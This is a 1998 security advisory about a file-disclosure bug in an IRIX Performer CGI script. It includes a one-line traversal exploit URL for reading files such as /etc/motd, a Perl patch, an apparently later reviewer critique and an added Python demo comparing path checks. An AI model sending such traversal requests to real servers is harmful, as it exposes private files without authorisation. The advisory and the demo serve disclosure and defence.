X-RDate: Tue, 17 Mar 1998 16:42:29 +0500 (ESK)
Date: Tue, 17 Mar 1998 00:06:48 +0100
From: "J.A. Gutierrez" <[email protected]>
To: [email protected]
Subject: IRIX performer_tools bug
Do you remember the /cgi-bin/handler bug?
Well, more of the same:
Software:
IRIX 6.2
performer_tools.sw.webtools (Performer API Search Tool 2.2)
/var/www/cgi-bin/pfdispaly.cgi
Bug: Anyone can read files (as 'nobody') from your system:
Exploit:
lynx -source \
'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
for instance :-)
Fix:
*** pfdispaly.cgi.O Mon Mar 16 23:13:34 1998
--- pfdispaly.cgi Mon Mar 16 23:36:29 1998
***************
*** 14,19 ****
--- 14,20 ----
$fullcgiroot = "/var/www$cgiroot";
$shortfilepath = "$ARGV[0]";
+ $shortfilepath =~ s/\.{2,}//g;
$fullfilepath = "$maindocroot$shortfilepath";
($filename = $shortfilepath) =~ s/.*\/(.*)$/$1/;
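Review bot: the added `$shortfilepath =~ s/\.{2,}//g;` silently rewrites the request instead of rejecting it, so a legitimate document whose name contains consecutive dots (for example `notes..html`) is served as `noteshtml` or not found, while the client gets no error telling it why. A reviewer would rather see the script refuse any path containing a `..` component (print an error and exit before the `$fullfilepath = "$maindocroot$shortfilepath";` line), or, better, build `$fullfilepath`, canonicalise it and check that the result still begins with `$maindocroot`, since a prefix check on the resolved path is independent of how the traversal was spelled. The hunk also only covers this one script's `$ARGV[0]`; the other Performer CGIs that take a path the same way are not touched by it.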
Note: I haven't tested the other Performer CGI's too much,
maybe they will have more nasty bugs.
(in fact, pfdispaly.cgi opens "$ARGV[0]" with "$maindocroot"
prepended; but somewhere 'dangerous' characters are escaped)
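The bug described above comes from building "$maindocroot$shortfilepath" from the client-supplied path without checking where the result ends up. The script below is an added example written for this page, not code from the advisory or from the Performer tools: it renders, in Python rather than the original Perl, the vulnerable concatenation, the advisory's s/\.{2,}//g strip, and a canonicalising prefix check (a hardened variant assumed here, not the vendor's fix), and runs all three against the advisory's exploit path under a temporary docroot constructed inline. It goes slightly beyond the advisory by also including a symlink that points outside the docroot, which a purely lexical fix cannot see. All function names, file names and the symlink are this example's own.

```python
"""Path-traversal checks modelled on pfdispaly.cgi's "$maindocroot$shortfilepath".

Added example (not from the advisory or from the Performer tools). The docroot,
files and symlink are constructed under a temporary directory so it runs offline.
"""
import os
import re
import tempfile


def vulnerable_path(maindocroot, shortfilepath):
    # What the advisory describes: docroot + client path, no check at all.
    return maindocroot + shortfilepath


def regex_stripped_path(maindocroot, shortfilepath):
    # The advisory's fix, $shortfilepath =~ s/\.{2,}//g; rendered in Python.
    return maindocroot + re.sub(r"\.{2,}", "", shortfilepath)


def escapes_lexically(maindocroot, fullpath):
    """Lexical check only: does the normalised path leave the docroot?"""
    root = os.path.normpath(maindocroot)
    norm = os.path.normpath(fullpath)
    return not (norm == root or norm.startswith(root + os.sep))


def canonical_path(maindocroot, shortfilepath):
    """Hardened variant (assumed, not the vendor's): resolve the path and require
    it to stay under the docroot. Returns the resolved path, or None if it escapes.
    The leading '/' of the client path is dropped so it is joined under the root.
    """
    root = os.path.realpath(maindocroot)
    candidate = os.path.realpath(os.path.join(root, shortfilepath.lstrip("/")))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def run_demo():
    """Build a throwaway docroot and exercise the three variants.

    Returns a dict of outcomes so the behaviour can be asserted on.
    """
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "htdocs")
        outside = os.path.join(tmp, "outside")
        os.makedirs(os.path.join(root, "pub"))
        os.makedirs(outside)
        with open(os.path.join(root, "pub", "index.html"), "w") as f:
            f.write("<html>ok</html>\n")
        with open(os.path.join(outside, "secret.txt"), "w") as f:
            f.write("not for the web\n")
        # Constructed: a symlink inside the docroot that points outside it.
        os.symlink(outside, os.path.join(root, "pub", "out"))

        traversal = "/../../../../etc/motd"  # the advisory's exploit path

        # Unpatched: the concatenated path walks straight out of the docroot.
        results["vulnerable_escapes"] = escapes_lexically(
            root, vulnerable_path(root, traversal))
        # Advisory's regex: no ".." survives, so the traversal is stopped...
        results["regex_escapes"] = escapes_lexically(
            root, regex_stripped_path(root, traversal))
        # ...but legitimate names with consecutive dots are silently mangled.
        results["regex_mangles"] = os.path.basename(
            regex_stripped_path(root, "/pub/notes..txt"))
        # ...and a lexical check cannot see a symlink leading outside.
        results["regex_symlink_escapes"] = escapes_lexically(
            root, regex_stripped_path(root, "/pub/out/secret.txt"))

        # Canonicalising check: rejects both the traversal and the symlink,
        # while a normal file under the docroot is still served.
        results["canon_traversal"] = canonical_path(root, traversal)
        results["canon_symlink"] = canonical_path(root, "/pub/out/secret.txt")
        ok = canonical_path(root, "/pub/index.html")
        results["canon_legit_readable"] = ok is not None and os.path.isfile(ok)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

The regex strip does stop the exploit in the advisory, because a traversal needs a ".." component and none can survive the global substitution; the difference shows in what it does to honest requests and in what it cannot check. Resolving the path and comparing it against the resolved docroot answers the question the script actually cares about, "is the file I am about to open under the docroot", regardless of how the request was spelled or what the filesystem contains.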
There is another bug in pfsearch.cgi, which lacks a
print "Content-type: text/html\n\n";
line, so you get garbage in your browser.
(and even worse, you have to enable JavaScript if you want
to use this set of CGIs...)
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)